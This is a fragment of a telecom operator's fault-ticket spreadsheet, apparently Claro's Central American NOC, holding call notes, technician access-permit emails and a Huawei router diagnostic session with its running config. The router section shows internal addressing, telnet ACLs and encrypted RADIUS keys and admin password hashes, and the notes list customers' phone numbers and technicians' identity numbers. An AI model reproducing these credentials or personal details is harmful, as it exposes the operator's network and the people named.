PARA: BANCAELECTRONICA@FEDECREDITO.COM.SV &lt;BANCAELECTRONICA@FEDECREDITO.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | IP2028530SV |CAJA DE CREDITO CHALATENANGO | DE LA PUMA ESCALON, A LA PAR DE CENTRO COMERCIAL GALERIAS, PASEO GENERAL ESCALON CHALATENANGO,
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO IP2028530SV  |CAJA DE CREDITO CHALATENANGO  | DE LA PUMA ESCALON, A LA PAR DE CENTRO COMERCIAL GALERIAS, PASEO GENERAL ESCALON CHALATENANGO,
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DIA DE HOY.
TECNICOS:
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
00936126-7 MARIO ERNESTO CRUZ MARQUEZ
02878871-1 JOSE ALFREDO JIMENEZ
00580847-9 CARLOS EDUARDO GOMEZ ZELEDON
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
03547221-1 RONAL MOREL CRESPIN
03245714-4 ADAN ERNESTO GONZALEZ
01968544-3 WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 JOSE SALVADOR PORTILLO VELASQUEZ
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4562397</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZELIK URIEL RAMIREZ REYES AL 4489 5331 SOLICITA QUE SE LE LLAME EN 5 MIN NUEVAMENTE **
ID 2001213120 - 2001213692
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ZELIK URIEL RAMIREZ REYES AL 4489 5331 INDICA QUE NO CUENTAN CON ENERGIA EN SITIO **
ID 2001219967
**</t>
  </si>
  <si>
    <t>F4562399</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DANIEL ALBERTO GARCÍA 45836146 MENCIONA QUE YA CUENTAN CON ENERGIA ELECTRICA, YA TODO FUNCIONA CORRECTAMENTE
-ID 2001241201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DANIEL ALBERTO GARCÍA AL 4583 6146 SOLICITA QUE SE LE LLAME A LAS 13 HRS YA QUE ESTA TRATANDO DE COMUNICARSE A LA FISCALIA PERO NO LE RESPONDEN **
ID 2001224045
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DANIEL ALBERTO GARCÍA AL 4583 6146 SOLICITA QUE SE LE LLAME EN 5 MIN NUEVAMENTE QUE CONFIRMARA **
ID 2001221255
**</t>
  </si>
  <si>
    <t>F4562402</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 ROBERTO MENCIONA QUE ESTARAN COMPARTIENDO LOS DATOS DE PR POR CORREO
-ID 2001278654</t>
  </si>
  <si>
    <t>F4562407</t>
  </si>
  <si>
    <t>SE LLAMA A DAVID QUIEN INDICA QUE SE DEJE EN OBSERVACION 2 HORAS Y SE DEVUELVA, COMENTA QUE PERDIO COMUNICACION SE LE INDICA LOG ENCONTRADOS.</t>
  </si>
  <si>
    <t>F4562413</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE WILLIAM MEMBREÑO 74891036 MENCIONA QUE AL REALIZAR LA PRIMER LLAMADA TODO ESTA BIEN PERO DESPUES YA NO DEJA SACAR NINGUNA LLAMADA JOSE - 73274993
-ID 2001314945</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR CON CLIENTE WILLIAM MEMBREÑO 74891036 / 74358042 PERO NO NOS CONTESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM MEMBREÑO 74891036 - 74358042 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001591856 - 2001592002</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR AL CLIENTE WILLIAM MEMBREÑO 74358042 PARA INFORMALE LO ENCONTRADO, PERO NO SE TIENE RESPUESTA. SE INTENTARÁ CONTACTAR MAS ADELANTE. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WILLIAM MEMBREÑO 74891036 / 74358042 PARA VALIDAR EL SERVICIO, NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM MEMBREÑO 74891036 / 74358042 PARA SOLICITAR LOS DATOS DE VISITA
-ID 2001610339
NOMBRE DEL CLIENTE: S.L.I. ABOGADOS CONSULTORES S.A.
UBICACIÓN: SAN SALVADOR COL. MANUEL JOSE ARCE AVENIDA INFANTERIA 13 AL FINAL DE LA CALLE COPEFA
CONTACTO EN SITIO: WILLIAM MEMBREÑO 74891036
HORARIO DE ATENCION:NO IMPORTA EL HORARIO - UNICAMENTE NOTIFICAR EN QUE HORARIO LLEGARA PERSONAL TECNICO
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. SE HABLO CON EL CLIENTE ERNESTO MELENDEZ.
2001275089
COLA:
NOMBRE: A: 0050322396900
NÚMERO: 0050322396900
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050322396900
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 15:02:39</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE - 73274993 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGIUIMIENTO
-ID 2001216841</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WILLIAM MEMBREÑO 74891036 / 74358042 PARA VALIDAR SI NO SE TIENE CORTES DE LLAMADAS HACIA NUMEROS MOVILES O FIJOS YA QUE ACTUALMENTE HAY FALLA A NIVEL DE ATP, PERO NO NOS CONTESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4562433</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
VIE 13/05/2022 11:45 A.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4585¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿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2433¿¿
ID: 47503678T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM4585
UBICADO EN:
CAJERO 4587_LOCAL ANCLA 1 PRIMER NIVEL CC PRADERA VISTARES, DIAGONAL 19 36-61 ZONA 12 GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562438</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE ROBERTO MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001278654</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A TELMEX CON SOLICITUD DE CONTACTOS DEL PUNTO REMOTO Y VALIDAR PRUEBAS DE PRIMER NIVEL:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100042T::: TICKET CNOC IMBBL003885::: "LINK DOWN"</t>
  </si>
  <si>
    <t>F4562439</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO HAY SEGUIMIENTO DESDE LAS  13/05/2022 12:21:08 Y NO HAY NADA PENDIENTE POR EL CL POR LO QUE SE CAMBIA DE ESTADO A TRABAJO EN CURSO Y SE LE NOTIFICA AL GESTOR DARWINH.ESPANA VIA SKYPE.</t>
  </si>
  <si>
    <t>F4562447</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK RIVERA AL 83529784 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO PARA REALIZAR PRUEBAS**
ID 2001295664
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK RIVERA AL 83529784 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO PARA REALIZAR PRUEBAS**
ID 2001260530
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK RIVERA AL 83529784 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001226633
**</t>
  </si>
  <si>
    <t>F4562450</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERENTE AL  85306597 CONTESTA LA SEÑORITA NELDANIA MOLINA INIDCA QUE CADA 10 MIN SE LE CAE EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001234399
**</t>
  </si>
  <si>
    <t>F4562452</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDERSON UTILIN-36493515 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001271882</t>
  </si>
  <si>
    <t>F4562457</t>
  </si>
  <si>
    <t>-* LUIS MORALES 52001303 (CLIENTE) INFORMA QUE NO ESTA EN SITIO Y ACTUALMENTE NO TIENEN PERSONAL EN SITIO, COORDINARA PERSONAL Y NOS DEVOLVERA LA LLAMADA -*
-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS SE LE COMENTA SOBRE EL CORTE DE FO, AGRADECE EL SEGUIMIENTO, SOLICITA LLAMAR  CUANDO SE TENGA EL SERVICIO OPERATIVO
2001243488
COLA:
NOMBRE: A: 52001303
NÚMERO: 52001303
DURACIÓN: 0:01:48
ESTADO: CONECTADA
DETALLES: 52001303
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 13/05/2022 13:19:39</t>
  </si>
  <si>
    <t>ESTIMADOS FAVOR SU APOYO CON VISITE TECNICA, GRACIAS.
FALLA:::: F4562457
NOMBRE DEL CLIENTE:::: ECOMADERA, S.A.
UBICACIÓN:::: INTERNET_KM 100.7 AUTOPISTA PUERTO QUETZAL ESCUINTLA SAN JOSE 13.944146 -90.788101
CONTACTO EN SITIO::::  LUIS MORALES || 52001303
GESTIÓN DE PERMISOS:::: SOLO IDENTIFICADOS
FECHA Y HORA:::: HOY LO ANTES POSIBLE HASTA SOLVENTAR EL INCIDENTE.
ULTIMA MILLA::::   CTC
EQUIPO DE ACCESO (SW):::: TRÁFICO PSJ CTC-UNION FRM220A-03 ESJOGTPSN1D1A04A20AHA2, (10.174.24.245) TARJETA 13  PUERTO 2
TIPO DE ENLACE:::: INTERNET
PROBLEMA QUE REPORTA:::: ENLACE CAIDO
DIAGNÓSTICO DEL PROBLEMA:::: NO HAY LINK DE FO, -40 DBM EN PUERTO DE ACCESO, CLIENTE VALIDA EQUIPOS ENCENDIDOS Y CONEXIONES EN BUEN ESTADO, APLICO REINICIO PERO ENLACE CONTINUA DOWN.
ACCIONES A TOMAR:::: REVISAR EL MEDIO, REVISIÓN DE EQUIPOS Y CONEXIONES EN NODO Y EN SITIO REMOTO.</t>
  </si>
  <si>
    <t>F4562463</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUBI CHAVARRIA  AL 30130082 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001240279
**</t>
  </si>
  <si>
    <t>SE VALIDA SEGÚN CRONOLOGÍA DE FALLA QUE YA ESTA OPERATIVO Y ESTABLE POR LO QUE NO CORRESPONDE EL ESTADO DE TICKET, SE CAMBIA A TRABAJO EN CURSO Y SE LE NOTIFICA AL GESTOR ALEJANDRO.NAVARRO VIA SKYPE. VALIDAR EL CIERRE CON LA SD</t>
  </si>
  <si>
    <t>F4562471</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA ANTERIOR, SE DEBE DE DEJAR EN MONITOREO HASTA LAS 18:00 HORAS, ESTADO PC NO APLICA SE MUEVA A TRABAJO EN CURSO Y SE LE NOTIFICA AL GESTOR DARWINH.ESPANA EL CAMBIO.
13/05/2022 11:58:49 GUATEMALA/CENTRO AMERICA (LUIS.NORIEGA):
JULIAN  SALAZAR  22437253 INDICA QUE SE QUEDE EN MONITOREO HASTA LAS 18 HRS ID 2001215082</t>
  </si>
  <si>
    <t>F4562480</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
IP2328001 / BANCO PROMERICA, S.A</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001590899</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 25135037 MENCIONA QUE PERSISTE EL INCONVENIENTE, GESTOR MENCIONA QUE DEVOLVERA LA LLAMADA
-ID 2001752232</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 INDICA QUE HOY A LAS 15:00 HRS ESTARAN REALIZANDO PRUEBAS DE VALIDACION SOLICITA QUE SE LE LLAME A LAS 16 HRS PARA CONFIRMAR **
ID 2001672509
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO PLEITEZ AL 25135037 INDICA QUE HA TENIDO INESTABILIDAD INDICA QUE SE VERIQUEN  PUERTOS POTENCIA DE FIBRA Y SOLICITA QUE SE LE ENVIE CORREO CON LO SOLICITADO PARA VER DONDE ES EL PROBLEMA || SE NOTIFICA A GESTOR **
ID 2001243538
**</t>
  </si>
  <si>
    <t>F4562491</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE CARLOS CHEN AL 4324623 NO RESPONDE , NUMERO DESCONECTADO SE INTENTARA LUEGO **
ID 2001295143 - 2001295197
**</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE CARLOS CHEN AL 4324623 NO RESPONDE , SE INTENTARA LUEGO **
ID 2001246172 2001246267
**</t>
  </si>
  <si>
    <t>F4562495</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL PARA VALIDAR
RE: G240 - ENLACE CLARO - CON ID 770600145T</t>
  </si>
  <si>
    <t>F4562496</t>
  </si>
  <si>
    <t>CLIENTE AUTORIZA ACCESOS PARA PERSONAL TÉCNICO
BYRON ESTUARDO RUIZ SALAZAR &lt;BYRON.RUIZS@SOMOSCMI.COM&gt;
VIE 13/05/2022 16:33
ASUNTO: PG418 || VISITA TÉCNICA || PG418 ,CENTRO COMERCIAL PLAZA ELENA LOCAL 12
BUENA TARDE
POR FAVOR PRESENTARSE AL PDV.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE Y VALIDA QUE LINK 1 DE CTC SE ENCUENTRA APAGADO,  APLICA REINICIO Y QUEDA EN EL MISMO ESTADO.
NÚMERO: 011 50246111326
FIN: HOY, 12:30
ID DE LLAMADA: 2001225410</t>
  </si>
  <si>
    <t>F4562497</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA COMUNICACION ENTRE SEGMENTOS Y INDICA QUE ESTA MOLESTO PUES ESTA SOLICITUD LLEVA VARIAS SEMANAS</t>
  </si>
  <si>
    <t>F4562505</t>
  </si>
  <si>
    <t>CLIENTE WENDY GARCÍA REALIZA PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO.
2001233223
COLA:
NOMBRE: A: 49973324
NÚMERO: 49973324
DURACIÓN: 0:08:47
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 49973324
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 13/05/2022 12:59:39 P. M.</t>
  </si>
  <si>
    <t>CLIENTE WENDY ARAGON 49973324 APOYA UBICANDO EQUIPO AETHRA 6044 SE LE SOLICITA REINICIARLO</t>
  </si>
  <si>
    <t>F4562509</t>
  </si>
  <si>
    <t>**SE LLAMA A HENRY  OROZCO AL 41783053 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001249390
**</t>
  </si>
  <si>
    <t>F4562520</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUIEN INDICA QUE SE ESPERE EN LINEA--
77770756</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO EL DÍA DE MAÑANA A LAS  8:30 AM // QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 15:52
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; ANIBAL.GONZALEZ@BANRURAL.COM &lt;ANIBAL.GONZALEZ@BANRURAL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 8900471T | | SD1124082 | BANCO DE DESARROLLO RURAL, S.A.
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO AL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, EL DÍA DE MAÑANA 13 / 05 / 2022 A LAS  8:30 AM
DIRECCIÓN:  5 CALLE 5-13 ZONA 1 MALACATAN, SAN MARCOS
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
AGUILAR SANCHEZ, MARLON FLORIAN	510053	1833771251211
JUAREZ GONZALEZ, BILLY DAVID	612059	1594145121202
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4562526</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAMIRO CASTILLO 51960028 MENCIONA QUE SI CUENTAN CON ENERGIA ELECTRICA
-ID 2001239196
NOMBRE DEL CLIENTE: UNIVERSIDAD DA VINCI DE GUATEMALA
UBICACIÓN:10 CALLE 0-74 ZONA 9
CONTACTO EN SITIO: RAMIRO CASTILLO - 51960028
HORARIO DE ATENCION:8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- JCASTILLOM@UDV.EDU.GT</t>
  </si>
  <si>
    <t>F4562527</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAMIRO CASTILLO 51960028 QUIEN INDICA QUE EL YA VE OPERATIVO SU SERVICIO PORQUE LE LLEGA A SU IP PUBLICA QUE ESTABA CAIDA, SE LE INDICA QUE ÉSTE ES UN SERVICIO DE DATOS, CLIENTE INDICA QUE EL NO SABE POR QUE CLARO ABRE DOS TICKETS SI VAN POR EL MISMO MEDIO
SE LE INDICA A CLIENTE QUE NO SE OBSERVA EQUIPOS ASOCIADOS A LAN PERO CLIENTE INDICA QUE ES PORQUE EL ENRUTO SU SERVICIO HACIA OTRA SALIDA Y QUE POR LA NOCHE HARA EL CAMBIO HACIA EL EQUIPO DE CLARO XT
2001296250
COLA:
NOMBRE: A: 51960028
NÚMERO: 011 50251960028
DURACIÓN: 0:03:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50251960028
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/05/2022 16:13:45
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS INT DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0                                                INTERFACE
ETH0/0/0                      DOWN    DOWN     HUAWEI, AR SERIES, ETHERNET0/0/0                                                INTERFACE
ETH0/0/1                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/2                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/3                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/4                      UP      UP       WAN PRINCIPAL/_/810900006T/_/
GE0/0/0                       *DOWN   DOWN     INTERFACE NO ESTA EN USO
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
LOOP10                        UP      UP(S)    HUAWEI, AR SERIES, LOOPBACK10 INT                                               ERFACE
LOOP502                       UP      UP(S)    HUAWEI, AR SERIES, LOOPBACK502 IN                                               TERFACE
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN DEL CLIENTE
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS IP INT BRIE
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 3
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 3
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           DOWN       DOWN
ETHERNET0/0/4                     192.168.193.210/30   UP         UP
GIGABITETHERNET0/0/0              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.212.194.56/32     UP         UP(S)
LOOPBACK10                        UNASSIGNED           UP         UP(S)
LOOPBACK502                       10.13.150.205/32     UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           10.10.50.1/24        DOWN       DOWN
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
192.168.193.210 F898-EF71-5CD9            I -         ETH0/0/4
192.168.193.209 001E-F742-2340  16        D-0         ETH0/0/4
10.10.50.1      F898-EF71-5CD8            I -         VLANIF1
------------------------------------------------------------------------------
TOTAL:3         DYNAMIC:1       STATIC:0     INTERFACE:2
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
192.168.193.210 F898-EF71-5CD9            I -         ETH0/0/4
192.168.193.209 001E-F742-2340  12        D-0         ETH0/0/4
10.10.50.1      F898-EF71-5CD8            I -         VLANIF1
------------------------------------------------------------------------------
TOTAL:3         DYNAMIC:1       STATIC:0     INTERFACE:2
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS IP INT BRIE
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 3
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 5
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 3
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           DOWN       DOWN
ETHERNET0/0/4                     192.168.193.210/30   UP         UP
GIGABITETHERNET0/0/0              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.212.194.56/32     UP         UP(S)
LOOPBACK10                        UNASSIGNED           UP         UP(S)
LOOPBACK502                       10.13.150.205/32     UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           10.10.50.1/24        DOWN       DOWN
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS INT DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0                                                INTERFACE
ETH0/0/0                      DOWN    DOWN     HUAWEI, AR SERIES, ETHERNET0/0/0                                                INTERFACE
ETH0/0/1                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/2                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/3                      *DOWN   DOWN     INTERFACE NO ESTA EN USO
ETH0/0/4                      UP      UP       WAN PRINCIPAL/_/810900006T/_/
GE0/0/0                       *DOWN   DOWN     INTERFACE NO ESTA EN USO
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
LOOP10                        UP      UP(S)    HUAWEI, AR SERIES, LOOPBACK10 INT                                               ERFACE
LOOP502                       UP      UP(S)    HUAWEI, AR SERIES, LOOPBACK502 IN                                               TERFACE
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN DEL CLIENTE
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;
&lt;CC_UNIVERSIDAD_DAVINCI_GT_10C_074&gt;DIS CURR
[V200R007C00SPCB00]
#
 SYSNAME CC_UNIVERSIDAD_DAVINCI_GT_10C_074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ROUTER ID 10.13.150.205
#
DHCP ENABLE
#
RADIUS-SERVER TEMPLATE DEFAULT
RADIUS-SERVER TEMPLATE RADIUS
 RADIUS-SERVER SHARED-KEY CIPHER %^%#F3DLKI/.H,&gt;CB#P&amp;GAE#OU*B~_+WW#EPG#8QJI:U%^%#
 RADIUS-SERVER AUTHENTICATION 10.10.4.100 1812 SOURCE LOOPBACK 502 WEIGHT 80
 RADIUS-SERVER ACCOUNTING 10.10.4.100 1813 SOURCE LOOPBACK 502 WEIGHT 80
 UNDO RADIUS-SERVER USER-NAME DOMAIN-INCLUDED
RADIUS-SERVER AUTHORIZATION 10.10.4.100 SHARED-KEY CIPHER %^%#TBH8HK#O|"{KVL.DB^JGCOSC$$BNYUXS{P;`(D;8%^%#
#
PKI REALM DEFAULT
 ENROLLMENT SELF-SIGNED
#
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
#
ACL NUMBER 2988
 DESCRIPTION MONITOREO DE CLARO
 RULE 1 PERMIT SOURCE 10.255.24.144 0.0.0.7
 RULE 2 PERMIT SOURCE 190.148.15.192 0.0.0.15
#
ACL NUMBER 3001
 DESCRIPTION "RADIUS_ACCESO"
 STEP 1
 RULE 2 PERMIT TCP SOURCE 10.120.26.0 0.0.0.255 DESTINATION-PORT EQ TELNET
 RULE 3 PERMIT TCP SOURCE 192.168.0.0 0.0.255.255 DESTINATION-PORT EQ TELNET
 RULE 4 PERMIT TCP SOURCE 66.119.95.0 0.0.0.255 DESTINATION-PORT EQ TELNET
 RULE 5 PERMIT TCP SOURCE 10.10.0.0 0.0.255.255 DESTINATION-PORT EQ TELNET
 RULE 6 DENY TCP DESTINATION-PORT EQ TELNET
 RULE 7 DENY TCP DESTINATION-PORT EQ 22
#
AAA
 AUTHENTICATION-SCHEME DEFAULT
  AUTHENTICATION-MODE RADIUS LOCAL
 AUTHENTICATION-SCHEME RADIUS
  AUTHENTICATION-MODE RADIUS
 AUTHORIZATION-SCHEME DEFAULT
 ACCOUNTING-SCHEME DEFAULT
  ACCOUNTING-MODE RADIUS
  ACCOUNTING START-FAIL ONLINE
 DOMAIN DEFAULT
 DOMAIN DEFAULT_ADMIN
  RADIUS-SERVER RADIUS
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER %^%#,~;Z!U\TR5E9WW2V(YC@Y[PT4!Q\EU[&lt;GGSNK7\H'N'=0-GN6KO-DL/RMDCQ%^%#
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TELNET TERMINAL SSH FTP HTTP
 LOCAL-USER GESTIONIP PASSWORD IRREVERSIBLE-CIPHER %^%#/DFQ#`MV^5ST~`EM6TU-1[U:77VIP2.2EKBNBTN4%&lt;K$6Q0SMOWY%WY_FX+6%^%#
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET TERMINAL SSH FTP HTTP
#
FIREWALL ZONE LOCAL
 PRIORITY 16
#
 NAT ALG DNS ENABLE
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
